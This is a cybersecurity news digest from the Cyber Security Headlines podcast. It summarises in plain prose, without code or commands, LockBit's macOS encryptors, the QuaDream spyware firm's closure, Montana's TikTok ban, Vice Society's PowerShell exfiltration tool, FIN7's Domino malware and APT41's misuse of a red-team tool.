Cyber Security Headlines: LockBit on macOS, low code security, and QuaDream shuts down

Ransomware comes for macOS

The massive LockBit ransomware operation traditionally designed its encryptors to target Windows, Linux and VMWare ESXi servers. However researchers at MalwareHunterTeam discovered a ZIP archive on VirusTotal containing new encryptors, including ones or macOS. This likely marks the first major ransomware operation specifically targeting Macs. The encryptors not only targeted modern Apple silicon architecture, but also older PowerPC CPUs, so even your old Xserve is at risk. An analysis by Bleeping Computer found that these lacked the same refinement as other LockBit encryptors, indicating test builds. 

(Bleeping Computer)

The security considerations of low code

Security Week’s Kevin Townsend looked at why understanding the security considerations of low code and no-code solutions remains critical. Often security analysts don’t have coding skills, but would benefit from automating time-consuming workflows. These automation solutions can help quickly deploy security workflows, potentially avoiding months of development. The can help replace paper forms with apps, or automatically remediate simple alerts. The downside is that these tools require a lot of access to an organization, leading to a huge attack surface if they are compromised. If these automation solutions are used by one-person IT shops, they might not be prepared for the risk. In larger shops, these tools easily create sprawling shadow IT that can be hard to centralize. 

(Security Week)

Israeli offensive cyber company shutting down

Calcalist’s source say the Israeli firm QuaDream informed employees it will cease operations in the coming days. This comes after damning reports last week from Microsoft and Citizen Lab. Their researchers found QuaDream’s spyware tools being used to target journalists, advocacy groups, and opposition groups in at least 10 countries. Last year Reuters reported QuaDream developed zero-click spyware similar to that used by NSO Group. Calcalist’s sources say QuaDream hasn’t been fully active for months. 

(Calcalist)

Montana legislature approves statewide TikTok ban

We’ve covered several US states banning TikTok on government-managed devices. But now the Montana House of Representatives approved a bill banning the social media app TikTok in the state by a vote of 54-43. This bill prohibits downloads of the app on any device in the state. The bill now goes to Governor Greg Gianforte for signature, although its unclear if it will be signed into law. If it does, it goes into effect in January, with fines against app stores and TikTok of $10,000 per day for violations.

(BBC)

And now a word from our sponsor, Pentera

This episode of Cyber Security Headlines is made possible in part by Pentera. Today over 60% of cyber attacks involve the use of exposed credentials. Now, for the first time, security teams can address this critical threat head-on. Pentera collects an organization’s leaked credentials and automatically tests their exploitability across the external and internal attack surface. 

Pentera’s customers find that leveraging the Pentera automated security validation platform as part of their exposure management strategy increases their ability to identify security gaps, improves the efficiency of remediation processes, and maximizes their security readiness. 
To learn more, visit Pentera.io

Vice Society using PowerShell tool for exfiltration

Researchers at Palo Alto Networks report that the pernicious ransomware organization began using a PowerShell-based tool for data exfiltration. The researchers found not using external tools increasingly common, as using PowerShell makes it harder for external tools to detect. This particular tool looks for mounted drives on a system, then recursively searches to root directories to exfiltrate data over HTTP. Palo Alto said its exclusion criteria shows a “professional level of coding.” 

(The Hacker News)

Operation Shamrock targets pig butchering scams

We’ve covered FBI warnings about the rise in so-called pig butchering scams. These outpaced business email compromise schemes in 2022 in the US, with victims tricked into sending cryptocurrency on the promise of an investment return. Now Santa Clara County Deputy District Attorney Erin West wants to bring local law enforcement to bear on these cases, saying it’s no longer acceptable for local law enforcement to just saw “we don’t do crypto.” West launched Operation Shamrock to help law enforcement and other stakeholders focus on the issues of education, seizure, and disruption for these scams. 

(CyberScoop)

Dominos lineup for FIN7

Researchers at IBM Security X-Force published a report detailing how the newly dubbed Domino malware strain developed by the Russia-based FIN7 cybercrime group has been seen in use by members of the now defunct Conti ransomware organization. The group uses Domino malware for follow-on exploitation once it compromised a system, delivering infostealers. Researchers began seeing Domino in the wild in October 2022. Other ransomware operators have used Domino since then, but only sporadically. 

(The Hacker News)

Chinese threat actors use red team tool in attack

The Google Threat Analysis Group reports the China-affiliated threat group used its Google Command and Control red teaming tool in an attack on a Taiwanese media organization. APT41 orchestrated the attacks, sending phishing emails with links to password-protected Google Drive files. The group used the tool to send commands from Google Sheets that exfiltrates data to Drive. The group previously used the tool in a July 2022 attack against an Italian organization. Google said it increasingly sees China-based attackers using open source red team tools, like Cobalt Strike, in attacks. It also found malicious actors increasingly using tool written in Go due to its cross-platform compatibility.

(Security Affairs)

Rich Stroffolino
Rich Stroffolino is a podcaster, editor and writer based out of Cleveland, Ohio. Since 2015, he's worked in technology news podcasting and media. He dreams of someday writing the oral history of Transmeta.